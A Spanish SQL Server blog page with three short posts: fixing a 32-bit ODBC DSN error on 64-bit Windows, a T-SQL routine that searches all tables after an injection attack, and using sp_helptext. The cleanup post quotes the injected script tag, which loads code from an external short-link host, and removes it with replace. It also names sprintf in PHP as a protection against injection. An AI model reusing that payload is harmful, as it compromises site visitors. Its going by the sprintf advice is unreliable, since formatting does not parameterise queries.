Archivos de Categoría: SQL Server - Paginas 6

ODBC 32 bits en sistemas 64 bits

Enviado por el 17/08/2012 12 comentarios

Hace poco me ha tocado importar una web de un sistema en 32 bits a uno en 64 bits y mi sorpresa llego cuando me creo una ODBC a un SQL server y al llamarlo desde PHP me muestra el siguiente error:

Warning: odbc_connect(): SQL error: [Microsoft][Administrador de controladores ODBC] La arquitectura del DSN especificado no coincide entre el controlador y la aplicación., SQL state IM014 in SQLConnect

Después de googlear me encuentro que hay que montar la ODBC como si fuera de 32 bits así que en vez de crearla desde panel de control / herramientas administrativas / Orígenes de datos ODBC, hay que hacerlo ejecutando el fichero C:\Windows\SysWOW64\odbcad32.exe

Buscar una cadena de texto en toda la base de datos

Enviado por el 05/03/2012 5 comentarios

Hace poco nos la han metido doblada en un proyecto y han conseguido hacer un query injection, problema, localizar todas las tablas donde han conseguido insertarlo. Al final me he marcado una pequeña rutina para buscar en todas las tablas de la base de datos….

En este caso buscamos la palabra script

DECLARE @resultados TABLE (columna nvarchar(370), valor nvarchar(3630))
DECLARE @tabla nvarchar(256), @columna nvarchar(128), @cadenaBuscar nvarchar(110)
SET  @tabla = ''
SET @cadenaBuscar = QUOTENAME('%script%','''')

WHILE @tabla IS NOT NULL 
	BEGIN
		SET @columna = ''
		SET @tabla =
		(SELECT MIN(QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME)) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE' AND QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME) > @tabla AND OBJECTPROPERTY(OBJECT_ID( QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME) ), 'IsMSShipped' ) = 0)
		WHILE (@tabla IS NOT NULL) AND (@columna IS NOT NULL)
			BEGIN
				SET @columna = (SELECT MIN(QUOTENAME(COLUMN_NAME)) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = PARSENAME(@tabla, 2) AND TABLE_NAME = PARSENAME(@tabla, 1) AND DATA_TYPE IN ('char', 'varchar', 'nchar', 'nvarchar') AND QUOTENAME(COLUMN_NAME) > @columna)
				IF @columna IS NOT NULL
					BEGIN
						INSERT INTO @resultados
						EXEC ( 'SELECT ''' + @tabla + '.' + @columna + ''', LEFT(' + @columna + ', 3630) FROM ' + @tabla + ' (NOLOCK) ' + ' WHERE ' + @columna + ' LIKE ' + @cadenaBuscar ) 
					END
				END
	END

SELECT columna, valor FROM @resultados

Con esto conseguimos que nos salga tabla, la columna y el registro donde lo ha encontrado por lo que podemos cargarnos el código malicioso con un simple replace:

update tabla set campo = replace(campo, '</title><script src=http://is.gd/s4NB8c ></script>', '')

Y ahora solo falta encontrar por donde se han colado, pero eso ya es otra historia… (cuando pille al zarpas que lo ha permitido se va a cargar).

Por cierto, la mejor forma de evitar query injection es meter todos los insert, updates y deletes en procedimientos almacenados y que el usuario que haga las select SOLO tenga permiso para select. A parte, cada lenguaje tiene sus propios sistemas para evitarlo: cfqueryparam en coldfusion, sprintf en PHP, etc

Obtener la estructura de un procedimiento o vista de SQL Server desde una consulta

Enviado por el 25/01/2012 Sin comentarios

Por circunstancias de un proyecto, no tenemos acceso al la base de datos y la única posibilidad de acceder es subiendo un fichero por FTP y ejecutar consultas. El problema es cuando no sabes que hace un procedimiento del cual no tienes copia en local. Solución tirar de la ayuda de SQL Server y encontrarte con el procedimiento del sistema sp_helptext :

EXEC sp_helptext 'dbo.procedimiento';
Este sitio utiliza cookies de Google para prestar sus servicios y analizar su tráfico. Tu dirección IP y user-agent se comparten con Google, junto con las métricas de rendimiento y de seguridad, para garantizar la calidad del servicio, generar estadísticas de uso y detectar y solucionar abusos. Más información.